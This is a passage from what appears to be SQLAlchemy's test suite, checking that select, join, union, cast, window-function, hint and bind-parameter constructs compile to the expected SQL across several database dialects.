.prefix_with("SQL_SOME_WEIRD_MYSQL_THING"), "SELECT SQL_CALC_FOUND_ROWS SQL_SOME_WEIRD_MYSQL_THING " "mytable.myid, mytable.name, mytable.description FROM mytable", ) def test_prefix_dialect_specific(self): self.assert_compile( table1.select() .prefix_with("SQL_CALC_FOUND_ROWS", dialect="sqlite") .prefix_with("SQL_SOME_WEIRD_MYSQL_THING", dialect="mysql"), "SELECT SQL_SOME_WEIRD_MYSQL_THING " "mytable.myid, mytable.name, mytable.description FROM mytable", dialect=mysql.dialect(), ) def test_collate(self): # columns clause self.assert_compile( select([column("x").collate("bar")]), "SELECT x COLLATE bar AS anon_1", ) # WHERE clause self.assert_compile( select([column("x")]).where(column("x").collate("bar") == "foo"), "SELECT x WHERE (x COLLATE bar) = :param_1", ) # ORDER BY clause self.assert_compile( select([column("x")]).order_by(column("x").collate("bar")), "SELECT x ORDER BY x COLLATE bar", ) def test_literal(self): self.assert_compile( select([literal("foo")]), "SELECT :param_1 AS anon_1" ) self.assert_compile( select([literal("foo") + literal("bar")], from_obj=[table1]), "SELECT :param_1 || :param_2 AS anon_1 FROM mytable", ) def test_calculated_columns(self): value_tbl = table( "values", column("id", Integer), column("val1", Float), column("val2", Float), ) self.assert_compile( select( [ value_tbl.c.id, (value_tbl.c.val2 - value_tbl.c.val1) / value_tbl.c.val1, ] ), "SELECT values.id, (values.val2 - values.val1) " "/ values.val1 AS anon_1 FROM values", ) self.assert_compile( select( [value_tbl.c.id], (value_tbl.c.val2 - value_tbl.c.val1) / value_tbl.c.val1 > 2.0, ), "SELECT values.id FROM values WHERE " "(values.val2 - values.val1) / values.val1 > :param_1", ) self.assert_compile( select( [value_tbl.c.id], value_tbl.c.val1 / (value_tbl.c.val2 - value_tbl.c.val1) / value_tbl.c.val1 > 2.0, ), "SELECT values.id FROM values WHERE " "(values.val1 / (values.val2 - values.val1)) " "/ values.val1 > :param_1", ) def test_percent_chars(self): t = table( "table%name", column("percent%"), column("%(oneofthese)s"), column("spaces % more spaces"), ) self.assert_compile( t.select(use_labels=True), """SELECT "table%name"."percent%" AS "table%name_percent%", """ """"table%name"."%(oneofthese)s" AS """ """"table%name_%(oneofthese)s", """ """"table%name"."spaces % more spaces" AS """ """"table%name_spaces % """ '''more spaces" FROM "table%name"''', ) def test_joins(self): self.assert_compile( join(table2, table1, table1.c.myid == table2.c.otherid).select(), "SELECT myothertable.otherid, myothertable.othername, " "mytable.myid, mytable.name, mytable.description FROM " "myothertable JOIN mytable ON mytable.myid = myothertable.otherid", ) self.assert_compile( select( [table1], from_obj=[ join(table1, table2, table1.c.myid == table2.c.otherid) ], ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable JOIN myothertable ON mytable.myid = myothertable.otherid", ) self.assert_compile( select( [ join( join( table1, table2, table1.c.myid == table2.c.otherid ), table3, table1.c.myid == table3.c.userid, ) ] ), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername, " "thirdtable.userid, " "thirdtable.otherstuff FROM mytable JOIN myothertable " "ON mytable.myid =" " myothertable.otherid JOIN thirdtable ON " "mytable.myid = thirdtable.userid", ) self.assert_compile( join( users, addresses, users.c.user_id == addresses.c.user_id ).select(), "SELECT users.user_id, users.user_name, users.password, " "addresses.address_id, addresses.user_id, addresses.street, " "addresses.city, addresses.state, addresses.zip " "FROM users JOIN addresses " "ON users.user_id = addresses.user_id", ) self.assert_compile( select( [table1, table2, table3], from_obj=[ join( table1, table2, table1.c.myid == table2.c.otherid ).outerjoin(table3, table1.c.myid == table3.c.userid) ], ), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername, " "thirdtable.userid," " thirdtable.otherstuff FROM mytable " "JOIN myothertable ON mytable.myid " "= myothertable.otherid LEFT OUTER JOIN thirdtable " "ON mytable.myid =" " thirdtable.userid", ) self.assert_compile( select( [table1, table2, table3], from_obj=[ outerjoin( table1, join( table2, table3, table2.c.otherid == table3.c.userid ), table1.c.myid == table2.c.otherid, ) ], ), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername, " "thirdtable.userid," " thirdtable.otherstuff FROM mytable LEFT OUTER JOIN " "(myothertable " "JOIN thirdtable ON myothertable.otherid = " "thirdtable.userid) ON " "mytable.myid = myothertable.otherid", ) query = select( [table1, table2], or_( table1.c.name == "fred", table1.c.myid == 10, table2.c.othername != "jack", text("EXISTS (select yay from foo where boo = lar)"), ), from_obj=[ outerjoin(table1, table2, table1.c.myid == table2.c.otherid) ], ) self.assert_compile( query, "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername " "FROM mytable LEFT OUTER JOIN myothertable ON mytable.myid = " "myothertable.otherid WHERE mytable.name = :name_1 OR " "mytable.myid = :myid_1 OR myothertable.othername != :othername_1 " "OR EXISTS (select yay from foo where boo = lar)", ) def test_full_outer_join(self): for spec in [ join(table1, table2, table1.c.myid == table2.c.otherid, full=True), outerjoin( table1, table2, table1.c.myid == table2.c.otherid, full=True ), table1.join(table2, table1.c.myid == table2.c.otherid, full=True), table1.outerjoin( table2, table1.c.myid == table2.c.otherid, full=True ), ]: stmt = select([table1]).select_from(spec) self.assert_compile( stmt, "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable FULL OUTER JOIN myothertable " "ON mytable.myid = myothertable.otherid", ) def test_compound_selects(self): assert_raises_message( exc.ArgumentError, "All selectables passed to CompoundSelect " "must have identical numbers of columns; " "select #1 has 2 columns, select #2 has 3", union, table3.select(), table1.select(), ) x = union( select([table1], table1.c.myid == 5), select([table1], table1.c.myid == 12), order_by=[table1.c.myid], ) self.assert_compile( x, "SELECT mytable.myid, mytable.name, " "mytable.description " "FROM mytable WHERE " "mytable.myid = :myid_1 UNION " "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable WHERE mytable.myid = :myid_2 " "ORDER BY mytable.myid", ) x = union(select([table1]), select([table1])) x = union(x, select([table1])) self.assert_compile( x, "(SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable UNION SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable) UNION SELECT mytable.myid," " mytable.name, mytable.description FROM mytable", ) u1 = union( select([table1.c.myid, table1.c.name]), select([table2]), select([table3]), ) self.assert_compile( u1, "SELECT mytable.myid, mytable.name " "FROM mytable UNION SELECT myothertable.otherid, " "myothertable.othername FROM myothertable " "UNION SELECT thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable", ) assert u1.corresponding_column(table2.c.otherid) is u1.c.myid self.assert_compile( union( select([table1.c.myid, table1.c.name]), select([table2]), order_by=["myid"], offset=10, limit=5, ), "SELECT mytable.myid, mytable.name " "FROM mytable UNION SELECT myothertable.otherid, " "myothertable.othername " "FROM myothertable ORDER BY myid " # note table name is omitted "LIMIT :param_1 OFFSET :param_2", {"param_1": 5, "param_2": 10}, ) self.assert_compile( union( select( [ table1.c.myid, table1.c.name, func.max(table1.c.description), ], table1.c.name == "name2", group_by=[table1.c.myid, table1.c.name], ), table1.select(table1.c.name == "name1"), ), "SELECT mytable.myid, mytable.name, " "max(mytable.description) AS max_1 " "FROM mytable WHERE mytable.name = :name_1 " "GROUP BY mytable.myid, " "mytable.name UNION SELECT mytable.myid, mytable.name, " "mytable.description " "FROM mytable WHERE mytable.name = :name_2", ) self.assert_compile( union( select([literal(100).label("value")]), select([literal(200).label("value")]), ), "SELECT :param_1 AS value UNION SELECT :param_2 AS value", ) self.assert_compile( union_all( select([table1.c.myid]), union(select([table2.c.otherid]), select([table3.c.userid])), ), "SELECT mytable.myid FROM mytable UNION ALL " "(SELECT myothertable.otherid FROM myothertable UNION " "SELECT thirdtable.userid FROM thirdtable)", ) s = select([column("foo"), column("bar")]) self.assert_compile( union(s.order_by("foo"), s.order_by("bar")), "(SELECT foo, bar ORDER BY foo) UNION " "(SELECT foo, bar ORDER BY bar)", ) self.assert_compile( union( s.order_by("foo").self_group(), s.order_by("bar").limit(10).self_group(), ), "(SELECT foo, bar ORDER BY foo) UNION (SELECT foo, " "bar ORDER BY bar LIMIT :param_1)", {"param_1": 10}, ) def test_compound_grouping(self): s = select([column("foo"), column("bar")]).select_from(text("bat")) self.assert_compile( union(union(union(s, s), s), s), "((SELECT foo, bar FROM bat UNION SELECT foo, bar FROM bat) " "UNION SELECT foo, bar FROM bat) UNION SELECT foo, bar FROM bat", ) self.assert_compile( union(s, s, s, s), "SELECT foo, bar FROM bat UNION SELECT foo, bar " "FROM bat UNION SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat", ) self.assert_compile( union(s, union(s, union(s, s))), "SELECT foo, bar FROM bat UNION (SELECT foo, bar FROM bat " "UNION (SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat))", ) self.assert_compile( select([s.alias()]), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat) AS anon_1", ) self.assert_compile( select([union(s, s).alias()]), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat UNION " "SELECT foo, bar FROM bat) AS anon_1", ) self.assert_compile( select([except_(s, s).alias()]), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat EXCEPT " "SELECT foo, bar FROM bat) AS anon_1", ) # this query sqlite specifically chokes on self.assert_compile( union(except_(s, s), s), "(SELECT foo, bar FROM bat EXCEPT SELECT foo, bar FROM bat) " "UNION SELECT foo, bar FROM bat", ) self.assert_compile( union(s, except_(s, s)), "SELECT foo, bar FROM bat " "UNION (SELECT foo, bar FROM bat EXCEPT SELECT foo, bar FROM bat)", ) # this solves it self.assert_compile( union(except_(s, s).alias().select(), s), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat EXCEPT " "SELECT foo, bar FROM bat) AS anon_1 " "UNION SELECT foo, bar FROM bat", ) self.assert_compile( except_(union(s, s), union(s, s)), "(SELECT foo, bar FROM bat UNION SELECT foo, bar FROM bat) " "EXCEPT (SELECT foo, bar FROM bat UNION SELECT foo, bar FROM bat)", ) s2 = union(s, s) s3 = union(s2, s2) self.assert_compile( s3, "(SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat) " "UNION (SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat)", ) self.assert_compile( union(intersect(s, s), intersect(s, s)), "(SELECT foo, bar FROM bat INTERSECT SELECT foo, bar FROM bat) " "UNION (SELECT foo, bar FROM bat INTERSECT " "SELECT foo, bar FROM bat)", ) # tests for [ticket:2528] # sqlite hates all of these. self.assert_compile( union(s.limit(1), s.offset(2)), "(SELECT foo, bar FROM bat LIMIT :param_1) " "UNION (SELECT foo, bar FROM bat LIMIT -1 OFFSET :param_2)", ) self.assert_compile( union(s.order_by(column("bar")), s.offset(2)), "(SELECT foo, bar FROM bat ORDER BY bar) " "UNION (SELECT foo, bar FROM bat LIMIT -1 OFFSET :param_1)", ) self.assert_compile( union(s.limit(1).alias("a"), s.limit(2).alias("b")), "(SELECT foo, bar FROM bat LIMIT :param_1) " "UNION (SELECT foo, bar FROM bat LIMIT :param_2)", ) self.assert_compile( union(s.limit(1).self_group(), s.limit(2).self_group()), "(SELECT foo, bar FROM bat LIMIT :param_1) " "UNION (SELECT foo, bar FROM bat LIMIT :param_2)", ) self.assert_compile( union(s.limit(1), s.limit(2).offset(3)).alias().select(), "SELECT anon_1.foo, anon_1.bar FROM " "((SELECT foo, bar FROM bat LIMIT :param_1) " "UNION (SELECT foo, bar FROM bat LIMIT :param_2 OFFSET :param_3)) " "AS anon_1", ) # this version works for SQLite self.assert_compile( union(s.limit(1).alias().select(), s.offset(2).alias().select()), "SELECT anon_1.foo, anon_1.bar " "FROM (SELECT foo, bar FROM bat" " LIMIT :param_1) AS anon_1 " "UNION SELECT anon_2.foo, anon_2.bar " "FROM (SELECT foo, bar " "FROM bat" " LIMIT -1 OFFSET :param_2) AS anon_2", ) def test_cast(self): tbl = table( "casttest", column("id", Integer), column("v1", Float), column("v2", Float), column("ts", TIMESTAMP), ) def check_results(dialect, expected_results, literal): eq_( len(expected_results), 5, "Incorrect number of expected results", ) eq_( str(cast(tbl.c.v1, Numeric).compile(dialect=dialect)), "CAST(casttest.v1 AS %s)" % expected_results[0], ) eq_( str(tbl.c.v1.cast(Numeric).compile(dialect=dialect)), "CAST(casttest.v1 AS %s)" % expected_results[0], ) eq_( str(cast(tbl.c.v1, Numeric(12, 9)).compile(dialect=dialect)), "CAST(casttest.v1 AS %s)" % expected_results[1], ) eq_( str(cast(tbl.c.ts, Date).compile(dialect=dialect)), "CAST(casttest.ts AS %s)" % expected_results[2], ) eq_( str(cast(1234, Text).compile(dialect=dialect)), "CAST(%s AS %s)" % (literal, expected_results[3]), ) eq_( str(cast("test", String(20)).compile(dialect=dialect)), "CAST(%s AS %s)" % (literal, expected_results[4]), ) # fixme: shoving all of this dialect-specific stuff in one test # is now officially completely ridiculous AND non-obviously omits # coverage on other dialects. sel = select([tbl, cast(tbl.c.v1, Numeric)]).compile( dialect=dialect ) if isinstance(dialect, type(mysql.dialect())): eq_( str(sel), "SELECT casttest.id, casttest.v1, casttest.v2, " "casttest.ts, " "CAST(casttest.v1 AS DECIMAL) AS anon_1 \nFROM casttest", ) else: eq_( str(sel), "SELECT casttest.id, casttest.v1, casttest.v2, " "casttest.ts, CAST(casttest.v1 AS NUMERIC) AS " "anon_1 \nFROM casttest", ) # first test with PostgreSQL engine check_results( postgresql.dialect(), ["NUMERIC", "NUMERIC(12, 9)", "DATE", "TEXT", "VARCHAR(20)"], "%(param_1)s", ) # then the Oracle engine check_results( oracle.dialect(), ["NUMERIC", "NUMERIC(12, 9)", "DATE", "CLOB", "VARCHAR2(20 CHAR)"], ":param_1", ) # then the sqlite engine check_results( sqlite.dialect(), ["NUMERIC", "NUMERIC(12, 9)", "DATE", "TEXT", "VARCHAR(20)"], "?", ) # then the MySQL engine check_results( mysql.dialect(), ["DECIMAL", "DECIMAL(12, 9)", "DATE", "CHAR", "CHAR(20)"], "%s", ) self.assert_compile( cast(text("NULL"), Integer), "CAST(NULL AS INTEGER)", dialect=sqlite.dialect(), ) self.assert_compile( cast(null(), Integer), "CAST(NULL AS INTEGER)", dialect=sqlite.dialect(), ) self.assert_compile( cast(literal_column("NULL"), Integer), "CAST(NULL AS INTEGER)", dialect=sqlite.dialect(), ) def test_over(self): self.assert_compile(func.row_number().over(), "row_number() OVER ()") self.assert_compile( func.row_number().over( order_by=[table1.c.name, table1.c.description] ), "row_number() OVER (ORDER BY mytable.name, mytable.description)", ) self.assert_compile( func.row_number().over( partition_by=[table1.c.name, table1.c.description] ), "row_number() OVER (PARTITION BY mytable.name, " "mytable.description)", ) self.assert_compile( func.row_number().over( partition_by=[table1.c.name], order_by=[table1.c.description] ), "row_number() OVER (PARTITION BY mytable.name " "ORDER BY mytable.description)", ) self.assert_compile( func.row_number().over( partition_by=table1.c.name, order_by=table1.c.description ), "row_number() OVER (PARTITION BY mytable.name " "ORDER BY mytable.description)", ) self.assert_compile( func.row_number().over( partition_by=table1.c.name, order_by=[table1.c.name, table1.c.description], ), "row_number() OVER (PARTITION BY mytable.name " "ORDER BY mytable.name, mytable.description)", ) self.assert_compile( func.row_number().over( partition_by=[], order_by=[table1.c.name, table1.c.description] ), "row_number() OVER (ORDER BY mytable.name, mytable.description)", ) self.assert_compile( func.row_number().over( partition_by=[table1.c.name, table1.c.description], order_by=[] ), "row_number() OVER (PARTITION BY mytable.name, " "mytable.description)", ) self.assert_compile( func.row_number().over(partition_by=[], order_by=[]), "row_number() OVER ()", ) self.assert_compile( select( [ func.row_number() .over(order_by=table1.c.description) .label("foo") ] ), "SELECT row_number() OVER (ORDER BY mytable.description) " "AS foo FROM mytable", ) # test from_obj generation. # from func: self.assert_compile( select( [func.max(table1.c.name).over(partition_by=["description"])] ), "SELECT max(mytable.name) OVER (PARTITION BY mytable.description) " "AS anon_1 FROM mytable", ) # from partition_by self.assert_compile( select([func.row_number().over(partition_by=[table1.c.name])]), "SELECT row_number() OVER (PARTITION BY mytable.name) " "AS anon_1 FROM mytable", ) # from order_by self.assert_compile( select([func.row_number().over(order_by=table1.c.name)]), "SELECT row_number() OVER (ORDER BY mytable.name) " "AS anon_1 FROM mytable", ) # this tests that _from_objects # concantenates OK self.assert_compile( select([column("x") + over(func.foo())]), "SELECT x + foo() OVER () AS anon_1", ) # test a reference to a label that in the referecned selectable; # this resolves expr = (table1.c.myid + 5).label("sum") stmt = select([expr]).alias() self.assert_compile( select([stmt.c.sum, func.row_number().over(order_by=stmt.c.sum)]), "SELECT anon_1.sum, row_number() OVER (ORDER BY anon_1.sum) " "AS anon_2 FROM (SELECT mytable.myid + :myid_1 AS sum " "FROM mytable) AS anon_1", ) # test a reference to a label that's at the same level as the OVER # in the columns clause; doesn't resolve expr = (table1.c.myid + 5).label("sum") self.assert_compile( select([expr, func.row_number().over(order_by=expr)]), "SELECT mytable.myid + :myid_1 AS sum, " "row_number() OVER " "(ORDER BY mytable.myid + :myid_1) AS anon_1 FROM mytable", ) def test_over_framespec(self): expr = table1.c.myid self.assert_compile( select([func.row_number().over(order_by=expr, rows=(0, None))]), "SELECT row_number() OVER " "(ORDER BY mytable.myid ROWS BETWEEN CURRENT " "ROW AND UNBOUNDED FOLLOWING)" " AS anon_1 FROM mytable", ) self.assert_compile( select([func.row_number().over(order_by=expr, rows=(None, None))]), "SELECT row_number() OVER " "(ORDER BY mytable.myid ROWS BETWEEN UNBOUNDED " "PRECEDING AND UNBOUNDED FOLLOWING)" " AS anon_1 FROM mytable", ) self.assert_compile( select([func.row_number().over(order_by=expr, range_=(None, 0))]), "SELECT row_number() OVER " "(ORDER BY mytable.myid RANGE BETWEEN " "UNBOUNDED PRECEDING AND CURRENT ROW)" " AS anon_1 FROM mytable", ) self.assert_compile( select([func.row_number().over(order_by=expr, range_=(-5, 10))]), "SELECT row_number() OVER " "(ORDER BY mytable.myid RANGE BETWEEN " ":param_1 PRECEDING AND :param_2 FOLLOWING)" " AS anon_1 FROM mytable", checkparams={"param_1": 5, "param_2": 10}, ) self.assert_compile( select([func.row_number().over(order_by=expr, range_=(1, 10))]), "SELECT row_number() OVER " "(ORDER BY mytable.myid RANGE BETWEEN " ":param_1 FOLLOWING AND :param_2 FOLLOWING)" " AS anon_1 FROM mytable", checkparams={"param_1": 1, "param_2": 10}, ) self.assert_compile( select([func.row_number().over(order_by=expr, range_=(-10, -1))]), "SELECT row_number() OVER " "(ORDER BY mytable.myid RANGE BETWEEN " ":param_1 PRECEDING AND :param_2 PRECEDING)" " AS anon_1 FROM mytable", checkparams={"param_1": 10, "param_2": 1}, ) def test_over_invalid_framespecs(self): assert_raises_message( exc.ArgumentError, "Integer or None expected for range value", func.row_number().over, range_=("foo", 8), ) assert_raises_message( exc.ArgumentError, "Integer or None expected for range value", func.row_number().over, range_=(-5, "foo"), ) assert_raises_message( exc.ArgumentError, "'range_' and 'rows' are mutually exclusive", func.row_number().over, range_=(-5, 8), rows=(-2, 5), ) def test_over_within_group(self): from sqlalchemy import within_group stmt = select( [ table1.c.myid, within_group( func.percentile_cont(0.5), table1.c.name.desc() ).over( range_=(1, 2), partition_by=table1.c.name, order_by=table1.c.myid, ), ] ) eq_ignore_whitespace( str(stmt), "SELECT mytable.myid, percentile_cont(:percentile_cont_1) " "WITHIN GROUP (ORDER BY mytable.name DESC) " "OVER (PARTITION BY mytable.name ORDER BY mytable.myid " "RANGE BETWEEN :param_1 FOLLOWING AND :param_2 FOLLOWING) " "AS anon_1 FROM mytable", ) stmt = select( [ table1.c.myid, within_group( func.percentile_cont(0.5), table1.c.name.desc() ).over( rows=(1, 2), partition_by=table1.c.name, order_by=table1.c.myid, ), ] ) eq_ignore_whitespace( str(stmt), "SELECT mytable.myid, percentile_cont(:percentile_cont_1) " "WITHIN GROUP (ORDER BY mytable.name DESC) " "OVER (PARTITION BY mytable.name ORDER BY mytable.myid " "ROWS BETWEEN :param_1 FOLLOWING AND :param_2 FOLLOWING) " "AS anon_1 FROM mytable", ) def test_date_between(self): import datetime table = Table("dt", metadata, Column("date", Date)) self.assert_compile( table.select( table.c.date.between( datetime.date(2006, 6, 1), datetime.date(2006, 6, 5) ) ), "SELECT dt.date FROM dt WHERE dt.date BETWEEN :date_1 AND :date_2", checkparams={ "date_1": datetime.date(2006, 6, 1), "date_2": datetime.date(2006, 6, 5), }, ) self.assert_compile( table.select( sql.between( table.c.date, datetime.date(2006, 6, 1), datetime.date(2006, 6, 5), ) ), "SELECT dt.date FROM dt WHERE dt.date BETWEEN :date_1 AND :date_2", checkparams={ "date_1": datetime.date(2006, 6, 1), "date_2": datetime.date(2006, 6, 5), }, ) def test_delayed_col_naming(self): my_str = Column(String) sel1 = select([my_str]) assert_raises_message( exc.InvalidRequestError, "Cannot initialize a sub-selectable with this Column", lambda: sel1.c, ) # calling label or as_scalar doesn't compile # anything. sel2 = select([func.substr(my_str, 2, 3)]).label("my_substr") assert_raises_message( exc.CompileError, "Cannot compile Column object until its 'name' is assigned.", sel2.compile, dialect=default.DefaultDialect(), ) sel3 = select([my_str]).as_scalar() assert_raises_message( exc.CompileError, "Cannot compile Column object until its 'name' is assigned.", sel3.compile, dialect=default.DefaultDialect(), ) my_str.name = "foo" self.assert_compile(sel1, "SELECT foo") self.assert_compile( sel2, "(SELECT substr(foo, :substr_2, :substr_3) AS substr_1)" ) self.assert_compile(sel3, "(SELECT foo)") def test_naming(self): # TODO: the part where we check c.keys() are not "compile" tests, they # belong probably in test_selectable, or some broken up # version of that suite f1 = func.hoho(table1.c.name) s1 = select( [ table1.c.myid, table1.c.myid.label("foobar"), f1, func.lala(table1.c.name).label("gg"), ] ) eq_(list(s1.c.keys()), ["myid", "foobar", str(f1), "gg"]) meta = MetaData() t1 = Table("mytable", meta, Column("col1", Integer)) exprs = ( table1.c.myid == 12, func.hoho(table1.c.myid), cast(table1.c.name, Numeric), literal("x"), ) for col, key, expr, lbl in ( (table1.c.name, "name", "mytable.name", None), (exprs[0], str(exprs[0]), "mytable.myid = :myid_1", "anon_1"), (exprs[1], str(exprs[1]), "hoho(mytable.myid)", "hoho_1"), ( exprs[2], str(exprs[2]), "CAST(mytable.name AS NUMERIC)", "anon_1", ), (t1.c.col1, "col1", "mytable.col1", None), ( column("some wacky thing"), "some wacky thing", '"some wacky thing"', "", ), (exprs[3], exprs[3].key, ":param_1", "anon_1"), ): if getattr(col, "table", None) is not None: t = col.table else: t = table1 s1 = select([col], from_obj=t) assert list(s1.c.keys()) == [key], list(s1.c.keys()) if lbl: self.assert_compile( s1, "SELECT %s AS %s FROM mytable" % (expr, lbl) ) else: self.assert_compile(s1, "SELECT %s FROM mytable" % (expr,)) s1 = select([s1]) if lbl: self.assert_compile( s1, "SELECT %s FROM (SELECT %s AS %s FROM mytable)" % (lbl, expr, lbl), ) elif col.table is not None: # sqlite rule labels subquery columns self.assert_compile( s1, "SELECT %s FROM (SELECT %s AS %s FROM mytable)" % (key, expr, key), ) else: self.assert_compile( s1, "SELECT %s FROM (SELECT %s FROM mytable)" % (expr, expr), ) def test_hints(self): s = select([table1.c.myid]).with_hint(table1, "test hint %(name)s") s2 = ( select([table1.c.myid]) .with_hint(table1, "index(%(name)s idx)", "oracle") .with_hint(table1, "WITH HINT INDEX idx", "sybase") ) a1 = table1.alias() s3 = select([a1.c.myid]).with_hint(a1, "index(%(name)s hint)") subs4 = ( select([table1, table2]) .select_from( table1.join(table2, table1.c.myid == table2.c.otherid) ) .with_hint(table1, "hint1") ) s4 = ( select([table3]) .select_from( table3.join(subs4, subs4.c.othername == table3.c.otherstuff) ) .with_hint(table3, "hint3") ) t1 = table("QuotedName", column("col1")) s6 = ( select([t1.c.col1]) .where(t1.c.col1 > 10) .with_hint(t1, "%(name)s idx1") ) a2 = t1.alias("SomeName") s7 = ( select([a2.c.col1]) .where(a2.c.col1 > 10) .with_hint(a2, "%(name)s idx1") ) mysql_d, oracle_d, sybase_d = ( mysql.dialect(), oracle.dialect(), sybase.dialect(), ) for stmt, dialect, expected in [ (s, mysql_d, "SELECT mytable.myid FROM mytable test hint mytable"), ( s, oracle_d, "SELECT /*+ test hint mytable */ mytable.myid FROM mytable", ), ( s, sybase_d, "SELECT mytable.myid FROM mytable test hint mytable", ), (s2, mysql_d, "SELECT mytable.myid FROM mytable"), ( s2, oracle_d, "SELECT /*+ index(mytable idx) */ mytable.myid FROM mytable", ), ( s2, sybase_d, "SELECT mytable.myid FROM mytable WITH HINT INDEX idx", ), ( s3, mysql_d, "SELECT mytable_1.myid FROM mytable AS mytable_1 " "index(mytable_1 hint)", ), ( s3, oracle_d, "SELECT /*+ index(mytable_1 hint) */ mytable_1.myid FROM " "mytable mytable_1", ), ( s3, sybase_d, "SELECT mytable_1.myid FROM mytable AS mytable_1 " "index(mytable_1 hint)", ), ( s4, mysql_d, "SELECT thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable " "hint3 INNER JOIN (SELECT mytable.myid, mytable.name, " "mytable.description, myothertable.otherid, " "myothertable.othername FROM mytable hint1 INNER " "JOIN myothertable ON mytable.myid = myothertable.otherid) " "ON othername = thirdtable.otherstuff", ), ( s4, sybase_d, "SELECT thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable " "hint3 JOIN (SELECT mytable.myid, mytable.name, " "mytable.description, myothertable.otherid, " "myothertable.othername FROM mytable hint1 " "JOIN myothertable ON mytable.myid = myothertable.otherid) " "ON othername = thirdtable.otherstuff", ), ( s4, oracle_d, "SELECT /*+ hint3 */ thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable JOIN (SELECT /*+ hint1 */ mytable.myid," " mytable.name, mytable.description, myothertable.otherid," " myothertable.othername FROM mytable JOIN myothertable ON" " mytable.myid = myothertable.otherid) ON othername =" " thirdtable.otherstuff", ), # TODO: figure out dictionary ordering solution here # (s5, oracle_d, # "SELECT /*+ hint3 */ /*+ hint1 */ thirdtable.userid, " # "thirdtable.otherstuff " # "FROM thirdtable JOIN (SELECT mytable.myid," # " mytable.name, mytable.description, myothertable.otherid," # " myothertable.othername FROM mytable JOIN myothertable ON" # " mytable.myid = myothertable.otherid) ON othername =" # " thirdtable.otherstuff"), ( s6, oracle_d, """SELECT /*+ "QuotedName" idx1 */ "QuotedName".col1 """ """FROM "QuotedName" WHERE "QuotedName".col1 > :col1_1""", ), ( s7, oracle_d, """SELECT /*+ "SomeName" idx1 */ "SomeName".col1 FROM """ """"QuotedName" "SomeName" WHERE "SomeName".col1 > :col1_1""", ), ]: self.assert_compile(stmt, expected, dialect=dialect) def test_statement_hints(self): stmt = ( select([table1.c.myid]) .with_statement_hint("test hint one") .with_statement_hint("test hint two", "mysql") ) self.assert_compile( stmt, "SELECT mytable.myid FROM mytable test hint one" ) self.assert_compile( stmt, "SELECT mytable.myid FROM mytable test hint one test hint two", dialect="mysql", ) def test_literal_as_text_fromstring(self): self.assert_compile(and_(text("a"), text("b")), "a AND b") def test_literal_as_text_nonstring_raise(self): assert_raises(exc.ArgumentError, and_, ("a",), ("b",)) class BindParameterTest(AssertsCompiledSQL, fixtures.TestBase): __dialect__ = "default" def test_binds(self): for ( stmt, expected_named_stmt, expected_positional_stmt, expected_default_params_dict, expected_default_params_list, test_param_dict, expected_test_params_dict, expected_test_params_list, ) in [ ( select( [table1, table2], and_( table1.c.myid == table2.c.otherid, table1.c.name == bindparam("mytablename"), ), ), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername FROM mytable, " "myothertable WHERE mytable.myid = myothertable.otherid " "AND mytable.name = :mytablename", "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername FROM mytable, " "myothertable WHERE mytable.myid = myothertable.otherid AND " "mytable.name = ?", {"mytablename": None}, [None], {"mytablename": 5}, {"mytablename": 5}, [5], ), ( select( [table1], or_( table1.c.myid == bindparam("myid"), table2.c.otherid == bindparam("myid"), ), ), "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable, myothertable WHERE mytable.myid = :myid " "OR myothertable.otherid = :myid", "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable, myothertable WHERE mytable.myid = ? " "OR myothertable.otherid = ?", {"myid": None}, [None, None], {"myid": 5}, {"myid": 5}, [5, 5], ), ( text( "SELECT mytable.myid, mytable.name, " "mytable.description FROM " "mytable, myothertable WHERE mytable.myid = :myid OR " "myothertable.otherid = :myid" ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = :myid OR " "myothertable.otherid = :myid", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = ? OR " "myothertable.otherid = ?", {"myid": None}, [None, None], {"myid": 5}, {"myid": 5}, [5, 5], ), ( select( [table1], or_( table1.c.myid == bindparam("myid", unique=True), table2.c.otherid == bindparam("myid", unique=True), ), ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " ":myid_1 OR myothertable.otherid = :myid_2", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = ? " "OR myothertable.otherid = ?", {"myid_1": None, "myid_2": None}, [None, None], {"myid_1": 5, "myid_2": 6}, {"myid_1": 5, "myid_2": 6}, [5, 6], ), ( bindparam("test", type_=String, required=False) + text("'hi'"), ":test || 'hi'", "? || 'hi'", {"test": None}, [None], {}, {"test": None}, [None], ), ( # testing select.params() here - bindparam() objects # must get required flag set to False select( [table1], or_( table1.c.myid == bindparam("myid"), table2.c.otherid == bindparam("myotherid"), ), ).params({"myid": 8, "myotherid": 7}), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " ":myid OR myothertable.otherid = 